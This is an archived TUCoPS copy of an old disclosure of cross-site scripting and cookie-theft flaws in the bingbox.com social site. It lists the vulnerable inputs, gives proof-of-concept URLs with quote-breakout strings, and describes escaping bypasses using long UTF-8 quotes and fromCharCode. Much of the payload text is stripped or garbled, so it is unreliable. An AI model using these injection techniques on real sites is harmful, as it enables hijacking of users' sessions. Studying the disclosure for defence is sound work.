Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Specific Sites :: b06-3078.htm

Bingbox.com - XSS & cookie disclosure



Bingbox.com - XSS & cookie disclosure
Bingbox.com - XSS & cookie disclosure



Bingbox.com=0D
=0D
Homepage:=0D
http://www.bingbox.com=0D 
=0D
Affected files:=0D
=0D
* Profile input boxes:=0D
=0D
- City input=0D
=0D
* Registering=0D
=0D
* Viewing Birthdays=0D
=0D
* Adding a friend=0D
=0D
* Viewing people online=0D
-----------------------------------------------=0D
=0D
XSS with cookie disclosure via inviting friends:=0D
">">">">'>'>'><"<=0D">http://www.bingbox.com/go/admin/f=friends&o=invite&a=msn&t=web&wizard=start">">">">">'>'>'><"<=0D 
=0D
"<"<'<'<'=0D
=0D
XSS vuln with cookie disclosure via "City" input box on profile:=0D
=0D
Data isnt properly sanatized before being generated. In one part of the site its output as full code on the screen (tested using  tags, with  tags, no =0D
=0D
code displays), and on the other part, an XSS can occur:=0D
=0D
For a PoC, since they add backslashes to ' and ", use the long UTF-8 Unicode for ':=0D
=0D
=0D =0D For the cookie:=0D =0D
=0D =0D --------------------------------------------------=0D =0D XSS with cookie disclosure when viewing a blog, that redirects you to the register page:=0D =0D ">">">">">'>'><"<"<'<'<"<"=0D">http://bingbox.com/go/register/wanted=luny666/">">">">">">'>'><"<"<'<'<"<"=0D =0D -----------------------------------------------=0D =0D XSS via viewing birthdays:=0D =0D '>'>'>"><"">">">"><"<"<"<"<'<'<'<"<""><=0D">http://www.bingbox.com/go/birthdays/month=8&day=13">'>'>'>"><"">">">"><"<"<"<"<'<'<'<"<""><=0D =0D "<"=0D =0D -------------------------------------------------=0D =0D XSS when adding a new friend. Same as above, we arent able to use ' or long UTF-8 unicode above, so we use fromCharCode's. PoC:=0D =0D '>'>'>"><"">">">">http://www.bingbox.com/go/admin/f=friends&o=new&friendname=DreamUnik">'>'>'>"><"">">">"> =0D ><"<"<"<"<'<'<'<"<""><"<"=0D =0D --------------------------------------------------=0D =0D XSS vuln when viewing people online:=0D =0D '>'>'>"><"">">">">http://www.bingbox.com/go/whoisonline/i=1&agemin=&agemax=&country=US">'>'>'>"><"">">">"> =0D ><"<"<"<"<'<'<'<"<""><"<"&locationarea=&sex=&page=3=0D =0D ------------------------------------------------=0D =0D More XSS vulns:=0D =0D '>'>'>"><"">">">"><"<"<"<"<'<'<'<"<""><=0D">http://www.bingbox.com/go/static/file=av">'>'>'>"><"">">">"><"<"<"<"<'<'<'<"<""><=0D'>'>'>"><"">">">"><"<"<"<"<'<'<'<"<""><=0D">http://www.bingbox.com/go/static/file=ps">'>'>'>"><"">">">"><"<"<"<"<'<'<'<"<""><=0D'>'>'>"><"">">">"><"<"<"<"<'<'<'<"<""><=0D">http://www.bingbox.com/go/static/file=gedragscode">'>'>'>"><"">">">"><"<"<"<"<'<'<'<"<""><=0D =0D =0D Screenshots:=0D http://www.youfucktard.com/xsp/bingbox1.jpg=0Dhttp://www.youfucktard.com/xsp/bingbox2.jpg=0Dhttp://www.youfucktard.com/xsp/bingbox3.jpg=0Dhttp://www.youfucktard.com/xsp/bingbox4.jpg=0Dhttp://www.youfucktard.com/xsp/bingbox5.jpg=0Dhttp://www.youfucktard.com/xsp/bingbox6.jpg=0Dhttp://www.youfucktard.com/xsp/bingbox7.jpg=0Dhttp://www.youfucktard.com/xsp/bingbox8.jpg


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH